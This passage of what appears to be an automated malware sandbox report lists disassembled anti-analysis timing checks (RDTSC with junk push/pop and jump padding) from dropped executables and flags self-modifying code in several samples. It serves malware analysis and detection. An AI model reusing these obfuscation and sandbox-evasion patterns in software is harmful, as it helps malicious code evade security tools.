Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1AF6 second address: 6F1B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA3F4E9719Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1B22 second address: 6F1B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1B27 second address: 6F1B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e jo 00007FA3F4E9719Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6F1D2F second address: 6F1D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711D19 second address: 711D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6DD55A second address: 6DD5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA3F4513F30h 0x00000008 jl 00007FA3F4513F26h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jns 00007FA3F4513F2Eh 0x00000018 pushad 0x00000019 jns 00007FA3F4513F26h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push ecx 0x00000023 jo 00007FA3F4513F26h 0x00000029 jnp 00007FA3F4513F26h 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 70FC86 second address: 70FC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3F4E971A0h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 70FF76 second address: 70FF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7100E6 second address: 7100FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4E971A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7100FD second address: 710103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710103 second address: 710109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710109 second address: 71010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71010D second address: 710111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6DD53E second address: 6DD55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F38h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710516 second address: 71051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71051A second address: 710535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F35h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710535 second address: 71054F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A4h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7106C5 second address: 7106D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA3F4513F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7106D1 second address: 7106D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71095E second address: 710963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710963 second address: 71096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA3F4E97196h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71096D second address: 710979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710979 second address: 71097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71097D second address: 710981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 710F02 second address: 710F16 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3F4E97196h 0x00000008 jc 00007FA3F4E97196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71146D second address: 711473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71158B second address: 711597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711597 second address: 7115A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F2Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7115A9 second address: 7115AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711702 second address: 711736 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3F4513F28h 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FA3F4513F36h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jc 00007FA3F4513F28h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push esi 0x0000001c jnc 00007FA3F4513F26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711736 second address: 711746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007FA3F4E97196h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711888 second address: 71188E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71188E second address: 711893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711893 second address: 711899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711899 second address: 7118AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715A01 second address: 715A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715B07 second address: 715B55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007FA3F4E971A4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FA3F4E971A0h 0x00000019 jmp 00007FA3F4E971A5h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push ebx 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C5C second address: 715C61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C61 second address: 715C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA3F4E9719Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C73 second address: 715C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C77 second address: 715C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E0A3F second address: 6E0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71D818 second address: 71D84D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E971A3h 0x00000008 jmp 00007FA3F4E9719Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4E971A8h 0x00000014 jnl 00007FA3F4E97196h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71D84D second address: 71D851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71DAE5 second address: 71DAEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71ED6D second address: 71ED73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EE63 second address: 71EE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EE68 second address: 71EE6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EF0B second address: 71EF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F525 second address: 71F534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FA3F4513F26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F642 second address: 71F65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3F4E971A2h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F894 second address: 71F8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 jnc 00007FA3F4513F2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71FACC second address: 71FB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FA3F4E97198h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push esi 0x00000029 movsx esi, di 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push esi 0x00000033 pop esi 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71FFAE second address: 71FFCF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3F4513F2Ch 0x00000008 jp 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3F4513F2Eh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7207D9 second address: 7207DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7207DF second address: 720801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 720801 second address: 720812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 720812 second address: 720817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7206E7 second address: 7206EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7206EB second address: 7206F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 721822 second address: 721828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722C77 second address: 722C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722C7B second address: 722CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA3F4E97198h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2520h], ecx 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2CF9h], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FA3F4E97198h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 jp 00007FA3F4E97196h 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722CDF second address: 722CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 723820 second address: 723843 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FA3F4E971A3h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E0D second address: 724E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E11 second address: 724E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA3F4E9719Ch 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E27 second address: 724E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724EC1 second address: 724ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 729271 second address: 729277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 729277 second address: 72927B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 72927B second address: 7292E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA3F4513F28h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2510h], ebx 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D29C0h], ecx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FA3F4513F28h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7292E2 second address: 7292E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: 9BCCE6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B61567 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: 9BA3DA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B86F34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B68532 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: BEB801 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 57FA9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 715AAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 71422C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 74061E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 57F98B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 7A73ED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Special instruction interceptor: First address: B2EB75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Special instruction interceptor: First address: D4FD35 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 24EB75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46FD35 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Memory allocated: 1480000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Memory allocated: 1AFE0000 memory reserve | memory write watch
